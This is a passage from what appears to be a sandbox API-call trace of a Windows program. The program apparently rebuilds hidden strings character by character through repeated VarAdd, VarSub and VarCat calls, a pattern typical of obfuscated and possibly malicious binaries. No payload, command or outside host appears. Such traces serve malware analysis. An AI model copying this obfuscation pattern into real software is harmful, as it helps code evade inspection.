(hWnd=0x103c0, lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1 [0136.665] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c0, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0136.665] GetFocus () returned 0x0 [0136.665] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 36 [0136.665] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c0, Msg=0xc, wParam=0x0, lParam=0x114fc44) returned 0x1 [0136.666] IsWindow (hWnd=0x103c0) returned 1 [0136.666] IsWindow (hWnd=0x103c0) returned 1 [0136.666] IsWindow (hWnd=0x103c0) returned 1 [0136.666] IsWindow (hWnd=0x103c0) returned 1 [0136.666] GetFocus () returned 0x0 [0136.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.669] VarAdd (in: pvarLeft=0x28f964, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0136.669] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f934, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.670] VarAdd (in: pvarLeft=0x28f964, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1150ccc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0136.670] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f934, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.671] VarAdd (in: pvarLeft=0x28f964, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0136.671] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f934, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.671] VarAdd (in: pvarLeft=0x28f964, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0136.672] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f934, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.672] VarAdd (in: pvarLeft=0x28f964, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x1150ccc, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0136.673] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f934, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="T\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.673] VarAdd (in: pvarLeft=0x28f964, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0136.674] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f934, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.675] VarAdd (in: pvarLeft=0x28f964, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0136.675] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f934, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.676] VarAdd (in: pvarLeft=0x28f964, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x1150ccc, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0136.676] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f934, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.677] VarAdd (in: pvarLeft=0x28f964, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0136.677] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f934, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.677] VarAdd (in: pvarLeft=0x28f964, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0136.678] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f934, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.678] VarAdd (in: pvarLeft=0x28f964, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150ccc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0136.678] VarCat (in: pvarLeft=0x28f9b4, pvarRight=0x28f934, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.679] VarAdd (in: pvarLeft=0x28f924, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0136.680] VarCat (in: pvarLeft=0x28f974, pvarRight=0x28f9c4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="I", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="I\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.680] VarAdd (in: pvarLeft=0x28f924, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x1150c7c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0136.680] VarCat (in: pvarLeft=0x28f974, pvarRight=0x28f9c4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="F", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.681] VarAdd (in: pvarLeft=0x28f924, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0136.681] VarCat (in: pvarLeft=0x28f974, pvarRight=0x28f9c4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="6", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.682] VarAdd (in: pvarLeft=0x28f924, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0136.682] VarCat (in: pvarLeft=0x28f974, pvarRight=0x28f9c4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="4", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.683] VarAdd (in: pvarLeft=0x28f924, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1150c7c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0136.683] VarCat (in: pvarLeft=0x28f974, pvarRight=0x28f9c4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.684] VarAdd (in: pvarLeft=0x28f924, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0136.684] VarCat (in: pvarLeft=0x28f974, pvarRight=0x28f9c4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.686] VarAdd (in: pvarLeft=0x28fa2c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0136.686] VarCat (in: pvarLeft=0x28f984, pvarRight=0x28f944, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="B", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="B\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.687] VarAdd (in: pvarLeft=0x28fa2c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x114edfc, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0136.687] VarCat (in: pvarLeft=0x28f984, pvarRight=0x28f944, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="F", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.688] VarAdd (in: pvarLeft=0x28fa2c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x114ee14, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0136.689] VarCat (in: pvarLeft=0x28f984, pvarRight=0x28f944, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.689] VarAdd (in: pvarLeft=0x28fa2c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0136.690] VarCat (in: pvarLeft=0x28f984, pvarRight=0x28f944, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="F", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="F\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.690] VarAdd (in: pvarLeft=0x28fa2c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x114edfc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0136.690] VarCat (in: pvarLeft=0x28f984, pvarRight=0x28f944, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.691] VarAdd (in: pvarLeft=0x28fa3c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0136.691] VarCat (in: pvarLeft=0x28fa0c, pvarRight=0x28f9fc, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.692] VarAdd (in: pvarLeft=0x28fa3c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0136.692] VarCat (in: pvarLeft=0x28fa0c, pvarRight=0x28f9fc, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="b\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.693] VarAdd (in: pvarLeft=0x28fa3c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0136.693] VarCat (in: pvarLeft=0x28fa0c, pvarRight=0x28f9fc, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.693] VarAdd (in: pvarLeft=0x28fa3c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0136.694] VarCat (in: pvarLeft=0x28fa0c, pvarRight=0x28f9fc, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.694] VarAdd (in: pvarLeft=0x28fa3c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0136.694] VarCat (in: pvarLeft=0x28fa0c, pvarRight=0x28f9fc, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.695] VarAdd (in: pvarLeft=0x28fa3c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0136.695] VarCat (in: pvarLeft=0x28fa0c, pvarRight=0x28f9fc, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.696] VarAdd (in: pvarLeft=0x28fa3c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0136.696] VarCat (in: pvarLeft=0x28fa0c, pvarRight=0x28f9fc, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.697] VarAdd (in: pvarLeft=0x28fa3c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0136.697] VarCat (in: pvarLeft=0x28fa0c, pvarRight=0x28f9fc, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="k\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.697] VarAdd (in: pvarLeft=0x28fa3c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0136.698] VarCat (in: pvarLeft=0x28fa0c, pvarRight=0x28f9fc, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.698] VarAdd (in: pvarLeft=0x28fa3c, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0136.699] VarCat (in: pvarLeft=0x28fa0c, pvarRight=0x28f9fc, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.699] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0136.700] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="G", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="G\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.700] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0x114ee2c, cchWideChar=1 | out: lpWideCharStr=":") returned 1 [0136.700] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.750] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x114ee14, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0136.751] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.751] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: 